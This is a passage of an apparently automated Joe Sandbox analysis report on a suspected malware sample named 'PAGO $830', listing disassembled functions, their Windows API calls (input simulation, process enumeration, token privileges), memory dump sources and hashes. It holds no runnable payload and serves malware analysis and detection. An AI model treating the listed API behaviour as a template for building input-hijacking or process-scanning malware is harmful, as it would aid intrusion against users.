                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                          • String ID:
                                                          • API String ID: 3321077145-0
                                                          • Opcode ID: 3fe2b2aa9e2dd4b7208186073fc3f183eda7627401626054b12d294e7497ad4e
                                                          • Instruction ID: 66dd94124b895d450f5d3414347eecf9cc2d56b7dec02c72388edd681aa93ffc
                                                          • Opcode Fuzzy Hash: 3fe2b2aa9e2dd4b7208186073fc3f183eda7627401626054b12d294e7497ad4e
                                                          • Instruction Fuzzy Hash: 34412B35600A10DFCB11EF15C444A19BBE2EF89724B18C488F94AAB362DB75FD41DBB1
                                                          Function 00DAD863 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00D96D01,00000000,00000000,00D98269,?,00D98269,?,00000001,00D96D01,8BE85006,00000001,00D98269,00D98269), ref: 00DAD8B0
                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00DAD939
                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00DAD94B
                                                          • __freea.LIBCMT ref: 00DAD954
                                                            • Part of subcall function 00DA37B0: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,00D8FD75,?,?,00D7B63D,00000000,?,?,?,00DE106C,00E0D0D0,?,00DB242E), ref: 00DA37E2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                          • String ID:
                                                          • API String ID: 2652629310-0
                                                          • Opcode ID: bed6acfced50e7ecc2b1d1ce01da0e74dad5352d32183bad7850ac7aabb9f6e0
                                                          • Instruction ID: 4c383d758f63fd257edc79d3ab6ac6a0d3b7ce1bc13e21ff1518a5381344f6c8
                                                          • Opcode Fuzzy Hash: bed6acfced50e7ecc2b1d1ce01da0e74dad5352d32183bad7850ac7aabb9f6e0
                                                          • Instruction Fuzzy Hash: DF31AE72A0020AABDF248F65DC45EAF7BA6EB46710F184168FC09E7190EB35DD54CBB0
                                                          Function 00E051F6 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00E05287
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E052AA
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E052B7
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E052DD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: LongWindow$InvalidateMessageRectSend
                                                          • String ID:
                                                          • API String ID: 3340791633-0
                                                          • Opcode ID: 87bf89df88f99a25d3b912ab6712f556a3186316fdb2cb762e4a0b1c65cd2d88
                                                          • Instruction ID: d316a4224d9cf64442b70703a20ad18b49f5b10dc8a7a31258eff91fece94e58
                                                          • Opcode Fuzzy Hash: 87bf89df88f99a25d3b912ab6712f556a3186316fdb2cb762e4a0b1c65cd2d88
                                                          • Instruction Fuzzy Hash: DD31F036A51A08BFEF309B54CC09BEA3775AF06754F586102FA11B62F0D375A9C49F41
                                                          Function 00DDAABA Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00DDAB0F
                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00DDAB2B
                                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 00DDAB92
                                                          • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00DDABE4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: KeyboardState$InputMessagePostSend
                                                          • String ID:
                                                          • API String ID: 432972143-0
                                                          • Opcode ID: a84248dc6e17335f16b4e0df5d77cd90ad309fdfeeb83b96ff3453934c1158a9
                                                          • Instruction ID: 1345925e749274abdc5cf53337ebccb59c6ae08338fff38fd5f2161a2fef5b08
                                                          • Opcode Fuzzy Hash: a84248dc6e17335f16b4e0df5d77cd90ad309fdfeeb83b96ff3453934c1158a9
                                                          • Instruction Fuzzy Hash: 85310830900218AEEF318B6DC815BFE7B6BAB45320F19C21BE491562D1C3798A878773
                                                          Function 00E07543 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ClientToScreen.USER32(?,?), ref: 00E07569
                                                          • GetWindowRect.USER32(?,?), ref: 00E075DF
                                                          • PtInRect.USER32(?,?,00E08A7B), ref: 00E075EF
                                                          • MessageBeep.USER32(00000000), ref: 00E0765B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                          • String ID:
                                                          • API String ID: 1352109105-0
                                                          • Opcode ID: 07a4c52cfbd95b43bc9b4e779f40ec8b074f0ac561716221b09d6dd1fb72ca78
                                                          • Instruction ID: 44504038e1af5f904f35c375a80f99907b6636ddad3a47a8bcc7b25698d95a43
                                                          • Opcode Fuzzy Hash: 07a4c52cfbd95b43bc9b4e779f40ec8b074f0ac561716221b09d6dd1fb72ca78
                                                          • Instruction Fuzzy Hash: 6941AD34E04A15DFCB11CF5DE884EA977F1BB59304F1451A8E992AB2A1C732F9C6CB90
                                                          Function 00E0160D Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetForegroundWindow.USER32 ref: 00E0161E
                                                            • Part of subcall function 00DD3985: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DD399F
                                                            • Part of subcall function 00DD3985: GetCurrentThreadId.KERNEL32 ref: 00DD39A6
                                                            • Part of subcall function 00DD3985: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00DD24F7), ref: 00DD39AD
                                                          • GetCaretPos.USER32(?), ref: 00E01632
                                                          • ClientToScreen.USER32(00000000,?), ref: 00E0167F
                                                          • GetForegroundWindow.USER32 ref: 00E01685
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                          • String ID:
                                                          • API String ID: 2759813231-0
                                                          • Opcode ID: 9aaa17b69d5ee6c5f4f135c5a65fd951146f5c58b4d72bc05b1673e228478241
                                                          • Instruction ID: b58a2d35c83fb4c8f862c5ab9f442799a843d413c1fe10e36249a662a8940c1a
                                                          • Opcode Fuzzy Hash: 9aaa17b69d5ee6c5f4f135c5a65fd951146f5c58b4d72bc05b1673e228478241
                                                          • Instruction Fuzzy Hash: 44312371D00209AFC704DFAAC8958AEB7F8EF88304B5484AAE415E7251EB319E45CBB1
                                                          Function 00DDD3FA Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00DDD41F
                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00DDD42D
                                                          • Process32NextW.KERNEL32(00000000,?), ref: 00DDD44D
                                                          • CloseHandle.KERNEL32(00000000), ref: 00DDD4FA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 420147892-0
                                                          • Opcode ID: 9059f39f8e3912c24448cd7553f6f679dd8d15782b94d53b35f42afa731b8ea1
                                                          • Instruction ID: 70f83155224bf9036d255273bd1f2025d4df1be970578aa1c26bc5b54e71982e
                                                          • Opcode Fuzzy Hash: 9059f39f8e3912c24448cd7553f6f679dd8d15782b94d53b35f42afa731b8ea1
                                                          • Instruction Fuzzy Hash: 1731D6311083009FC300EF50C885BAFBBF8EF89350F54452EF585961A1EB71A949CBB2
                                                          Function 00E08EBB Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00D8B021: GetWindowLongW.USER32(?,000000EB), ref: 00D8B032
                                                          • GetCursorPos.USER32(?), ref: 00E08EF3
                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00DC80CE,?,?,?,?,?), ref: 00E08F08
                                                          • GetCursorPos.USER32(?), ref: 00E08F50
                                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00DC80CE,?,?,?), ref: 00E08F86
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                          • String ID:
                                                          • API String ID: 2864067406-0
                                                          • Opcode ID: 1ceda0737c7c6656fccaa654e37c4f09916bed33f97e98250534fdb0bc920ec8
                                                          • Instruction ID: 960611c24db5ff2fc3e662f78af9236dc0fd25ed814b4df38b79608f9c051d60
                                                          • Opcode Fuzzy Hash: 1ceda0737c7c6656fccaa654e37c4f09916bed33f97e98250534fdb0bc920ec8
                                                          • Instruction Fuzzy Hash: ED21EF35200018AFDB258FA5CC58EEA7BBAEB4A310F140165F982A71E1C73199D1DB60
                                                          Function 00DDD1DF Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFileAttributesW.KERNEL32(?,00E0D034), ref: 00DDD219
                                                          • GetLastError.KERNEL32 ref: 00DDD228
                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00DDD237
                                                          • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00E0D034), ref: 00DDD294
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                                          • String ID:
                                                          • API String ID: 2267087916-0
                                                          • Opcode ID: 87dabe0654eb5ec556da2a63a1d342d482696c404db43ba988d3fd06b627cba4
                                                          • Instruction ID: 84bb4333bbb8d74341e92e81930cd6584d4292cd063697125ddf5def010140cf
                                                          • Opcode Fuzzy Hash: 87dabe0654eb5ec556da2a63a1d342d482696c404db43ba988d3fd06b627cba4
                                                          • Instruction Fuzzy Hash: B321D6305093019F8B10DF24D88045A7BE8EF56364F14461AF499D73A1E730DD4ACB72
                                                          Function 00DD14B5 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00DD0F58: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00DD0F6E
                                                            • Part of subcall function 00DD0F58: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00DD0F7A
                                                            • Part of subcall function 00DD0F58: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DD0F89
                                                            • Part of subcall function 00DD0F58: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00DD0F90
                                                            • Part of subcall function 00DD0F58: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DD0FA6
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00DD1502
                                                          • _memcmp.LIBVCRUNTIME ref: 00DD1525
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD155B
                                                          • HeapFree.KERNEL32(00000000), ref: 00DD1562
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                          • String ID:
                                                          • API String ID: 1592001646-0
                                                          • Opcode ID: d2628bcc116e28cb002b4a978a75b1073a817f13dc43982fed458b7a07da25db
                                                          • Instruction ID: d8deb3cf4958c65d9bb8c4fac863512e1eb709abbcd18da3e6efdeb0e2abcf31
                                                          • Opcode Fuzzy Hash: d2628bcc116e28cb002b4a978a75b1073a817f13dc43982fed458b7a07da25db
                                                          • Instruction Fuzzy Hash: E5218C31E40209BFDF10DFA8D945BEEB7B8EF84300F18405AE456AB241E735EA49CB60
                                                          Function 00E026B5 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EC), ref: 00E0273D
                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00E02757
                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00E02765
                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00E02773
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Window$Long$AttributesLayered
                                                          • String ID:
                                                          • API String ID: 2169480361-0
                                                          • Opcode ID: 108a356fe187c6ab6aa9ac7a8466625c1c8edd86745caed3cdcbc3388e27a91c
                                                          • Instruction ID: 00bf6cb663e5e6b19627ebb95f749c9dbcf7a90982de7398e8e1c1b5ed04ce3e
                                                          • Opcode Fuzzy Hash: 108a356fe187c6ab6aa9ac7a8466625c1c8edd86745caed3cdcbc3388e27a91c
                                                          • Instruction Fuzzy Hash: E521D335205111AFD7149B24CC48FAA77D5EF85328F28925DF52AAB2D2C771FC82CBA1
                                                          Function 00DD784B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00DD8CD3: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00DD7860,?,000000FF,?,00DD86AA,00000000,?,0000001C,?,?), ref: 00DD8CE2
                                                            • Part of subcall function 00DD8CD3: lstrcpyW.KERNEL32(00000000,?,?,00DD7860,?,000000FF,?,00DD86AA,00000000,?,0000001C,?,?,00000000), ref: 00DD8D08
                                                            • Part of subcall function 00DD8CD3: lstrcmpiW.KERNEL32(00000000,?,00DD7860,?,000000FF,?,00DD86AA,00000000,?,0000001C,?,?), ref: 00DD8D39
                                                          • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00DD86AA,00000000,?,0000001C,?,?,00000000), ref: 00DD7879
                                                          • lstrcpyW.KERNEL32(00000000,?,?,00DD86AA,00000000,?,0000001C,?,?,00000000), ref: 00DD789F
                                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,00DD86AA,00000000,?,0000001C,?,?,00000000), ref: 00DD78DA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: lstrcmpilstrcpylstrlen
                                                          • String ID: cdecl
                                                          • API String ID: 4031866154-3896280584
                                                          • Opcode ID: 29e102b4162d3a6f5c9a975a22561b737f5b521d474f8dc38d53fcac827ebf50
                                                          • Instruction ID: a1bd0c7c9fdc1fa381642dad65ee1e5646140be2b6a530a747276a3621ccbfb3
                                                          • Opcode Fuzzy Hash: 29e102b4162d3a6f5c9a975a22561b737f5b521d474f8dc38d53fcac827ebf50
                                                          • Instruction Fuzzy Hash: 0211033A200305AFCB156F39C849A7B77A9EF49750B54802BF902C7350FB329811E7B1
                                                          Function 00E05595 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(?,00001060,?,00000004), ref: 00E055F0
                                                          • _wcslen.LIBCMT ref: 00E05602
                                                          • _wcslen.LIBCMT ref: 00E0560D
                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E0574B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessageSend_wcslen
                                                          • String ID:
                                                          • API String ID: 455545452-0
                                                          • Opcode ID: b2ba42ff56b8f9110084a03836d8321a516b091de21651cc7f0b8c590de1d5ed
                                                          • Instruction ID: 15630f10cd77749639ec4f9e6cd86b84d6cd4c894b0e28c5e98ee26ce0f5ebfe
                                                          • Opcode Fuzzy Hash: b2ba42ff56b8f9110084a03836d8321a516b091de21651cc7f0b8c590de1d5ed
                                                          • Instruction Fuzzy Hash: E011A27660060896DF209BA59C85AEB77ACEF11754B10A13AF905F60C1EB74C9C58F70
                                                          Function 00DD196B Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00DD198B
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DD199D
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DD19B3
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DD19CE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 6c2161b7046f55201632b397be991bff79a214b7cce4b41aea19fb47403144da
                                                          • Instruction ID: 439aa6cfb4b04a8a44e5682db44e84aa1378dc02351acdf6f79e36c39e9639eb
                                                          • Opcode Fuzzy Hash: 6c2161b7046f55201632b397be991bff79a214b7cce4b41aea19fb47403144da
                                                          • Instruction Fuzzy Hash: 07113C3A900218FFEF109BA5CD95F9DBB78FB04754F200092E610B7290D6716E11DB94
                                                          Function 00DDE0F4 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 00DDE11B
                                                          • MessageBoxW.USER32(?,?,?,?), ref: 00DDE14E
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00DDE164
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00DDE16B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                          • String ID:
                                                          • API String ID: 2880819207-0
                                                          • Opcode ID: 81bfebe57bdc0208b0a37e252594fbb5c51b91e6bc077445c15f81d03ef1fb42
                                                          • Instruction ID: 5e37ea792b094adf3287f8cae9387d00228a7068be09b5b2962936a5800c8cfc
                                                          • Opcode Fuzzy Hash: 81bfebe57bdc0208b0a37e252594fbb5c51b91e6bc077445c15f81d03ef1fb42
                                                          • Instruction Fuzzy Hash: C911C476B00219BFCB01AFA99C05A9F7BADAB45320F144296F915E7391D671894887B0
                                                          Function 00D9D15C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                          Download Yara Rule
                                                          APIs
